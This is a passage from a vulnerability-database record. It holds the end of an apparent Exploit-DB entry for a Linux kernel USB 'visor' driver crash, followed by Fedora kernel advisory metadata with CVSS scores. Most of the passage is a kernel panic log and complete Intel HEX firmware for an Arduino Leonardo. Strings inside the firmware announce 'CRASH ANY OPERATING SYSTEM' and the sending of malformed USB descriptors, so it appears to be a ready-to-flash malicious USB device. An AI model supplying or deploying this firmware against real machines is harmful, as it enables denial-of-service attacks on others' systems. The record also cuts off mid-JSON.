visor\r\n[ 34.879838] usbserial: USB Serial support registered for Handspring Visor / \r\nPalm OS\r\n[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0\r\n[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5\r\n[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected\r\n[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at \r\n0000000000000058\r\n[ 34.921136] IP: [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] PGD 0 \r\n[ 34.921136] Oops: 0002 [#1] SMP \r\n[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \r\nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \r\nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \r\nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \r\nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \r\niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \r\nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \r\ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \r\ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \r\ndm_mirror dm_region_hash dm_log dm_mod\r\n[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \r\n3.10.0-229.14.1.el7.x86_64 #1\r\n[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \r\nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\r\n[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\r\n[ 34.921136] RIP: 0010:[<ffffffffa039306d>] [<ffffffffa039306d>] \r\nclie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286\r\n[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000\r\n[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0\r\n[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000\r\n[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0\r\n[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200\r\n[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \r\nknlGS:0000000000000000\r\n[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\r\n[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4: \r\n00000000000006f0\r\n[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \r\n0000000000000000\r\n[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\r\n[ 34.921136] Stack:\r\n[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8\r\n[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000\r\n[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000\r\n[ 34.921136] Call Trace:\r\n[ 34.921136] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\r\n[ 34.921136] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\r\n[ 34.921136] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\r\n[ 34.921136] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\r\n[ 34.921136] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\r\n[ 34.921136] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\r\n[ 34.921136] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\r\n[ 34.921136] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\r\n[ 34.921136] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\r\n[ 34.921136] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\r\n[ 34.921136] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\r\n[ 34.921136] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\r\n[ 34.921136] [<ffffffffa0398000>] ? 0xffffffffa0397fff\r\n[ 34.921136] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]\r\n[ 34.921136] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\r\n[ 34.921136] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\r\n[ 34.921136] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\r\n[ 34.921136] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\r\n[ 34.921136] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\r\n[ 34.921136] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\r\n[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48 \r\n8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89> \r\n41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff \r\n[ 34.921136] RIP [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] RSP <ffff88000bd23a80>\r\n[ 34.921136] CR2: 0000000000000058\r\n[ 35.341720] ---[ end trace b239663354a1c556 ]---\r\n[ 35.347341] Kernel panic - not syncing: Fatal exception\r\n[ 35.348314] drm_kms_helper: panic occurred, switching back to text console\r\n\r\nArduino Leonardo Firmware:\r\n\r\n:100000000C94A8000C94C5000C94C5000C94C50079\r\n:100010000C94C5000C94C5000C94C5000C94C5004C\r\n:100020000C94C5000C94C5000C94C4050C942F04CA\r\n:100030000C94C5000C94C5000C94C5000C94C5002C\r\n:100040000C94C5000C94C5000C94C5000C94C5001C\r\n:100050000C94C5000C94C5000C94C5000C940E02C1\r\n:100060000C94C5000C94C5000C94C5000C94C500FC\r\n:100070000C94C5000C94C5000C94C5000C94C500EC\r\n:100080000C94C5000C94C5000C94C5000C94C500DC\r\n:100090000C94C5000C94C5000C94C5000C94C500CC\r\n:1000A0000C94C5000C94C5000C94C5000B030E0302\r\n:1000B000010305032F032F032F03120316031A0353\r\n:1000C000200324032F032A030000000200080E006F\r\n:1000D00000030401000B000000000000000000000D\r\n:1000E00000000000000004080201104080401020C1\r\n:1000F00040804080080204018040201002011080EE\r\n:100100001020404004040404040304050202020217\r\n:1001100004030202020206060606060604040202A0\r\n:100120000204000000002300260029002C002F00FC\r\n:1001300000000000250028002B002E0031000000E8\r\n:100140000000240027002A002D00300000C180811B\r\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\r\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\r\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\r\n:10018000E1F70E94C8000C9404070C940000089545\r\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\r\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\r\n:1001B00083E00E94300361E087E00E94300361E049\r\n:1001C00088E00E9430030E9459067E012AE9E20E6F\r\n:1001D000F11C84E093E0D70111969C938E9389E003\r\n:1001E00094E013969C938E93129782E2E2E1F1E001\r\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\r\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\r\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\r\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\r\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\r\n:10024000992ED901E92D1D92EA95E9F78E010957FA\r\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\r\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\r\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\r\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\r\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\r\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\r\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\r\n:1002C0009C92F4E01196FC9311971496EC93F9012B\r\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\r\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\r\n:1002F000AE921C971183008373836283558344837A\r\n:100300000C5211092CE0F80111922A95E9F721E02D\r\n:10031000D80119962C931997FE01E059FF4F0190CF\r\n:100320000D929A94E1F7F8019387828761E088E063\r\n:100330000E9469038BE492E00E94650688E892E0DF\r\n:100340000E94650687EC92E00E94650686E093E0D5\r\n:100350000E94650682E493E00E9465068FE793E0C1\r\n:100360000E94650684EA93E00E9465068BEE93E0A6\r\n:100370000E94650683E00E949F03892B09F047C015\r\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\r\n:1003900084E194E00E946506BF92AF92DF92CF9213\r\n:1003A000FF92EF921F928F921F930F932DB73EB73C\r\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\r\n:1003C000BEB71196FE01FB96892D01900D928A957C\r\n:1003D000E1F78DE695E00E94030668E873E180E0AE\r\n:1003E00090E00E947B028DE695E00E944E0660E060\r\n:1003F00087E00E94690368E873E180E090E00E9472\r\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\r\n:1004100070E080E090E00E947B02ACCF1F920F92D0\r\n:100420000FB60F9211242F933F938F939F93AF9307\r\n:10043000BF938091650590916605A0916705B09185\r\n:1004400068053091640523E0230F2D3720F40196D1\r\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\r\n:10046000209364058093650590936605A0936705C6\r\n:10047000B09368058091690590916A05A0916B051C\r\n:10048000B0916C050196A11DB11D809369059093F3\r\n:100490006A05A0936B05B0936C05BF91AF919F91D6\r\n:1004A0008F913F912F910F900FBE0F901F90189535\r\n:1004B0003FB7F8948091690590916A05A0916B050A\r\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\r\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\r\n:1004E000711D811D911D42E0660F771F881F991FA6\r\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\r\n:10050000DF936B017C010E945802EB01C114D104FE\r\n:10051000E104F10479F00E9458026C1B7D0B683EE7\r\n:100520007340A0F381E0C81AD108E108F108C8516E\r\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\r\n:100540000895789484B5826084BD84B5816084BD4B\r\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\r\n:10056000808181608083E1E8F0E010828081826098\r\n:100570008083808181608083E0E8F0E08081816019\r\n:100580008083E1E9F0E08081826080838081816006\r\n:100590008083E0E9F0E0808181608083E1ECF0E03D\r\n:1005A000808184608083808182608083808181609B\r\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\r\n:1005C000808182608083E2ECF0E0808181608083C2\r\n:1005D000EAE7F0E0808184608083808182608083AC\r\n:1005E000808181608083808180688083089590E02D\r\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\r\n:10060000AB09809180008F7703C0809180008F7D3F\r\n:1006100080938000089584B58F7702C084B58F7D64\r\n:1006200084BD0895809190008F7707C080919000DD\r\n:100630008F7D03C080919000877F80939000089504\r\n:100640008091C0008F7703C08091C0008F7D809320\r\n:10065000C00008958091C200877F8093C2000895F2\r\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\r\n:10067000EC5FFE4F8491882349F190E0880F991F29\r\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\r\n:10069000C591D4919FB7611108C0F8948C912095B1\r\n:1006A00082238C93888182230AC0623051F4F894AB\r\n:1006B0008C91322F309583238C938881822B888371\r\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\r\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\r\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\r\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\r\n:10070000882321F069830E94F7026981E02FF0E0DD\r\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\r\n:100720008C91611103C01095812301C0812B8C93A2\r\n:100730009FBF0F90DF91CF911F910F910895CF939D\r\n:10074000DF93282F30E0F901E853FF4F8491F9013E\r\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\r\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\r\n:10077000EE5DFE4FA591B4912C912D2381E090E088\r\n:1007800021F480E002C080E090E0DF91CF910895F5\r\n:10079000615030F02091F100FC0120830196F8CFE8\r\n:1007A000289884E680937D0508951092E9001092C0\r\n:1007B00071051092700590936F0580936E050895F2\r\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\r\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\r\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\r\n:1007F000609170057091710540916E0550916F0583\r\n:1008000064177507ACF49091E8009570E1F390914E\r\n:10081000E80092FD1CC0A093F100A0917005B0917A\r\n:1008200071051196AF73BB27AB2B11F48093E800D1\r\n:10083000A0917005B09171051196B0937105A093C8\r\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\r\n:100850009FEFDF91CF911F910F91FF9008951F920D\r\n:100860000F920FB60F9211246F927F928F929F92E8\r\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\r\n:100880002F933F934F935F936F937F938F939F9398\r\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\r\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\r\n:1008B00046C168E0CE010A960E94C80382EF809389\r\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\r\n:1008D00003C08EEF8093E800892F807609F023C152\r\n:1008E0008B85811105C01092F1001092F10020C19A\r\n:1008F000282F2D7F213009F41BC1853049F48091C8\r\n:10090000E80080FFFCCF8C8580688093E30010C1F5\r\n:10091000863009F0E1C02D8508891989223009F057\r\n:10092000B3C0EC848E2D90E0209173053091740556\r\n:10093000821793070CF09FC00E94D5031F92EF927D\r\n:100940008DE394E09F938F930E9483068CE0E89E52\r\n:1009500070011124E0917505F0917605EE0DFF1DF3\r\n:1009600089E0DE01119601900D928A95E1F7C801A8\r\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\r\n:100980000E94E0030F900F900F900F90C12CD12C7C\r\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\r\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\r\n:1009B000818590E0681679060CF0BAC07F926F923C\r\n:1009C000BF92AF920E948306E0917505F091760583\r\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\r\n:1009E00080E00E94E0030F900F900F900F9000E0C6\r\n:1009F00010E0E0917505F0917605EE0DFF1D028483\r\n:100A0000F385E02DEC0DFD1D818590E00817190799\r\n:100A10005CF51F930F939F928F920E948306E09143\r\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\r\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\r\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\r\n:100A50006081718180E00E94E0030F5F1F4F0F9063\r\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\r\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\r\n:100A800083060F900F9058C0C8012A8B0E94D5038F\r\n:100A90002A892130C1F0233009F04EC08C851F9285\r\n:100AA0008F9389EF94E09F938F930E94830642E097\r\n:100AB00050E062E871E080E00E94E0030F900F9048\r\n:100AC0000F900F9035C04091000150E060E071E060\r\n:100AD00080E00E94E0032CC0873071F1883021F45F\r\n:100AE00081E08093F10024C0893011F5937021F5E5\r\n:100AF000EDE4F1E081E021E096E38093E9002093CA\r\n:100B0000EB0034913093EC009093ED008F5F3196C1\r\n:100B1000843099F78EE78093EA001092EA008C8582\r\n:100B20008093720505C0888999890E94D50304C005\r\n:100B30008EEF8093E80003C081E28093EB00629621\r\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\r\n:100B5000EF91BF91AF919F918F917F916F915F9135\r\n:100B60004F913F912F911F910F91FF90EF90DF9048\r\n:100B7000CF90BF90AF909F908F907F906F900F908D\r\n:100B80000FBE0F901F9018951F920F920FB60F92E5\r\n:100B900011248F939F938091E1001092E10083FFD5\r\n:100BA0000FC01092E90091E09093EB001092EC00DE\r\n:100BB00092E39093ED001092720598E09093F0000C\r\n:100BC00082FF1AC080917E05882339F080917E05CE\r\n:100BD000815080937E05882369F080917D0588236C\r\n:100BE00059F080917D05815080937D05811104C06D\r\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\r\n:100C00000F901F901895CF93DF93CDB7DEB782E199\r\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\r\n:100C20008F89988D9093760580937505898D9A8D1F\r\n:100C300090937405809373058B8D9C8D90937C05A8\r\n:100C400080937B058D8D9E8D90937A058093790599\r\n:100C50008F8D98A1909378058093770510927205F7\r\n:100C600081E08093D70080EA8093D80082E189BD3B\r\n:100C700009B400FEFDCF61E070E080E090E00E94EA\r\n:100C80007B0280E98093D8008CE08093E200109290\r\n:100C9000E000559A209ADF91CF91089581E08093EA\r\n:100CA000E00008959091C80095FFFCCF8093CE009E\r\n:100CB00008951092CD0087E68093CC0088E1809360\r\n:100CC000C9008EE08093CA0008950F931F93CF93BD\r\n:100CD000DF93EC018C01FE0101900020E9F73197D0\r\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\r\n:100CF000F80181918F010E945206EDCFDF91CF91D3\r\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\r\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\r\n:100D2000419151919F0160E071E0CE0101960E94D6\r\n:100D30000707CE0101960E946506D3950FB6F89479\r\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\r\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\r\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\r\n:100D70003F932F9389839A830E9483068981882ECB\r\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\r\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\r\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\r\n:100DB000EF920E9483060F5F1F4FC8018F70992723\r\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\r\n:100DD0000E9483060F900F90E1CF81E194E09F93F2\r\n:100DE0008F930E9483060F900F900F900F90DF91CA\r\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\r\n:100E0000AF909F908F900895F8940C94E809AEE00D\r\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\r\n:100E20004C831A83098377FF02C060E070E8615049\r\n:100E300071097E836D83A901BC01CE0101960E94D8\r\n:100E400033074D815E8157FD0AC02F8138854217D7\r\n:100E500053070CF49A01F801E20FF31F10822E964B\r\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\r\n:100E7000B1097C016B018A01FC0117821682838112\r\n:100E800081FFBDC1CE0101964C01F7019381F601AE\r\n:100E900093FD859193FF81916F01882309F4ABC184\r\n:100EA000853239F493FD859193FF81916F018532ED\r\n:100EB00029F4B70190E00E941B09E7CF512C312C97\r\n:100EC00020E02032A0F48B3269F030F4803259F007\r\n:100ED000833269F420612CC08D3239F0803339F4CB\r\n:100EE000216026C02260246023C0286021C027FD25\r\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\r\n:100F00005F9E300D1124532E13C08AE0389E300DA1\r\n:100F10001124332E20620CC08E3221F426FD6BC1C9\r\n:100F2000206406C08C3611F4206802C0883641F473\r\n:100F3000F60193FD859193FF81916F018111C1CFDE\r\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\r\n:100F5000F9830DC0833631F0833771F0833509F0A2\r\n:100F60005BC022C0F801808189830E5F1F4F44243B\r\n:100F70004394512C540115C03801F2E06F0E711CDE\r\n:100F8000F801A080B18026FF03C0652D70E002C08B\r\n:100F90006FEF7FEFC5012C870E9410092C018301A0\r\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\r\n:100FB000F801A080B18026FF03C0652D70E002C05B\r\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\r\n:100FD0002068222E830123FC1BC0832D90E048163D\r\n:100FE0005906B0F4B70180E290E00E941B093A94E0\r\n:100FF000F4CFF50127FC859127FE81915F01B701B0\r\n:1010000090E00E941B0931103A94F1E04F1A510808\r\n:101010004114510471F7E5C0843611F0893639F571\r\n:10102000F80127FF07C060817181828193810C5F85\r\n:101030001F4F08C060817181882777FD8095982FA8\r\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\r\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\r\n:1010600030E0A4010E944D09A82EA81844C085377D\r\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\r\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\r\n:1010900019F0883721F0AFC02F2F2061B22EB4FE97\r\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\r\n:1010B0009660B92E06C028E030E005C020E130E09F\r\n:1010C00002C020E132E0F801B7FE07C06081718103\r\n:1010D000828193810C5F1F4F06C06081718180E027\r\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\r\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\r\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\r\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\r\n:10112000FE01EA0DF11D8081803311F4297E09C092\r\n:1011300022FF06C07394739404C0822F867809F04E\r\n:10114000739423FD13C020FF06C05A2C731418F4A7\r\n:10115000530C5718732C731468F4B70180E290E0B5\r\n:101160002C870E941B0973942C85F5CF731410F4FF\r\n:10117000371801C0312C24FF12C0B70180E390E082\r\n:101180002C870E941B092C8522FF17C021FF03C05A\r\n:1011900088E590E002C088E790E0B7010CC0822F9C\r\n:1011A000867859F021FD02C080E201C08BE227FD64\r\n:1011B0008DE2B70190E00E941B09A51438F4B70135\r\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\r\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\r\n:1011E000F5CF332009F451CEB70180E290E00E94A0\r\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\r\n:101200009FEF2C96E2E10C94CD09FC010590615012\r\n:1012100070400110D8F7809590958E0F9F1F08950C\r\n:10122000FC016150704001900110D8F780959095B5\r\n:101230008E0F9F1F08950F931F93CF93DF93182F47\r\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\r\n:1012500082FF10C04E815F812C813D814217530770\r\n:101260007CF4E881F9819F012F5F3F4F3983288308\r\n:10127000108306C0E885F985812F0995892B29F708\r\n:101280002E813F812F5F3F4F3F832E83812F902FF1\r\n:10129000DF91CF911F910F910895FA01AA2728306D\r\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\r\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\r\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\r\n:1012D000A11D6A0F711D811D911DA11D20D009F452\r\n:1012E00068943F912AE0269F11243019305D319394\r\n:1012F000DEF6CF010895462F4770405D4193B3E07D\r\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\r\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\r\n:10132000A6959795879577956795BA95C9F700978C\r\n:101330006105710508959B01AC010A2E069457952D\r\n:10134000479537952795BA95C9F7620F731F841F84\r\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\r\n:1013600009942F923F924F925F926F927F928F9249\r\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\r\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\r\n:10139000F894DEBF0FBECDBF09942A8839884888EB\r\n:1013A0005F846E847D848C849B84AA84B984C88481\r\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\r\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\r\n:0413D000F894FFCFBF\r\n:1013D4001201000200000040AD0BEFBE000101024B\r\n:1013E4000001220342006100640020004200410029\r\n:1013F40042004500250078002500780025006E0095\r\n:1014040025007000180342004100440020004300FE\r\n:10141400300046004600450045002100120100024C\r\n:10142400000000404C0544010001010203010902CF\r\n:10143400270001010000FA0705810104040C0705D7\r\n:10144400010104000C0705820104000C07000700D9\r\n:101454000700480100500072006F006C00690066CC\r\n:101464000069006300000A550000006BFD180A00C3\r\n:10147400809F0AB901312B940A8101128946001315\r\n:10148400000257028B0A5E0AF80A5F01F212010099\r\n:1014940002010000400D055702000101020301B9D9\r\n:1014A4000A0100F80A5F0A810A220342006100640B\r\n:1014B400002000420041004200450025007800253C\r\n:1014C40000780025006E00250070001803420041DA\r\n:1014D400004400200043003000460046004500451B\r\n:1014E40000210012010002010000400D0557020016\r\n:1014F400010102030109040000030100000003F2DA\r\n:101504000AEC0A0902270001010000FA01AB0A09EA\r\n:101514000400000301000000090200202020202014\r\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\r\n:1015340020202020202020202020202020202020A7\r\n:1015440020205F5F5F5F5F205F5F20205F2020209F\r\n:101554002020205F5F0A0D00202020202F205F5FC5\r\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\r\n:101574005F5F20205F5F5F5F5F20202020202F209F\r\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\r\n:10159400202F5F5F0A0D002020202F202F202020E5\r\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\r\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\r\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\r\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\r\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\r\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\r\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\r\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\r\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\r\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\r\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\r\n:101654003C3C2043485241534820414E59204F506E\r\n:1016640045524154494E472053595354454D203E09\r\n:101674003E0A0D00203C3C202863292053657267F4\r\n:10168400656A20536368756D696C6F20323031353B\r\n:101694002C204F70656E536F7572636520536563BC\r\n:1016A40075726974792052616C66205370656E6E30\r\n:1016B4006562657267203E3E0A0D000A3E3E205078\r\n:1016C4007265737320627574746F6E20746F207307\r\n:1016D4007461727420657865637574696F6E2E2EFB\r\n:1016E4002E0A0D005B44454255475D2045786563ED\r\n:1016F400757465207061796C6F616420300A0D0027\r\n:10170400526563762D446174613A0A0D005B444569\r\n:101714004255475D200953656E6420436F6E6669C8\r\n:101724006775726174696F6E44657363726970740E\r\n:101734006F720928696E6465783A2569292E2E2E00\r\n:101744000D0A005B44454255475D200953656E64AC\r\n:1017540020496E74657266616365204465736372C3\r\n:101764006970746F720928696E7465726661636565\r\n:101774003A2569292E2E2E0D0A005B444542554711\r\n:101784005D200953656E6420456E64706F696E74E4\r\n:101794002044657363726970746F720928656E649E\r\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\r\n:1017B40044454255475D203C3C70616E6963206D31\r\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\r\n:1017D4002009203E3E20537472696E67204465736D\r\n:1017E40063726970746F72207265717565737420A9\r\n:1017F4002D2073656E64696E67206D616C666F720F\r\n:101804006D656420737472696E67212073657475E5\r\n:10181400702E7756616C75654C203D3D2025690D11\r\n:101824000A005B48455844554D505D0A0D0025306B\r\n:041834003258200006\r\n:00000001FF", "sourceHref": "https://www.exploit-db.com/raw/39540", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "The kernel meta package ", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-01-20T21:57:28", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.3.3-301.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7513", "CVE-2015-7566"], "modified": "2016-01-20T21:57:28", "id": "FEDORA:1CCEF6087EB7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TXRXBW36NAM6DMNM4LDWFGO5OBCFEIFI/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "The kernel meta package ", "cvss3": 